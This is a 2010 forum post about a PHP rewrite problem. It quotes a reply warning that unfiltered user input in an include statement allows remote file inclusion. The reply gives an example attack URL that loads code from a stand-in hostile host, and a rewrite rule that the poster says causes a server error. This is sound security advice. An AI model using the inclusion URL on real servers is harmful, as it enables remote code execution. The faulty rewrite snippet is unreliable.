11-27-2010, 12:36 AM
|
#3 (permalink)
|
|
The Wanderer
Join Date: Nov 2010
Posts: 5
Thanks: 0
|
Quote:
Originally Posted by sketchMedia
Two things, first of all the obvious security issues with that script. NEVER just allow user input to be used in scripts without first filtering them. With your example one could enter this into the URL param and be able to execute dangerous code from an external source on your server as if it came from your server, for example:
PHP Code:
include "{$_GET['folder']}/include.php";
If i then do this:
Code:
http://yourserver.com/script.php?folder=http://evilscriptslol.com/evil.inc?
In the PHP this would mean:
PHP Code:
include "http://evilscriptslol.com/evil.inc?/include.php";
Causing no end of problems (assuming allow_url_fopen) is enabled (as it is by default I believe)A simple switch would help mitigate the threat somewhat.
Filter Input Escape Output - Golden rule of web-development (and most other types of development)
Secondly to your actual problem, try adding [QSA] to the end of your rewrite rule:
Code:
Rewrite On
RewriteRule ^(.*)/(.*)\.php$ controller.php?folder=$1&page=$2 [QSA]
It should then pass any additional url parameters through. |
Thanks a lot! It says internal server error with your code :/
Quote:
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
|
|
|
|
|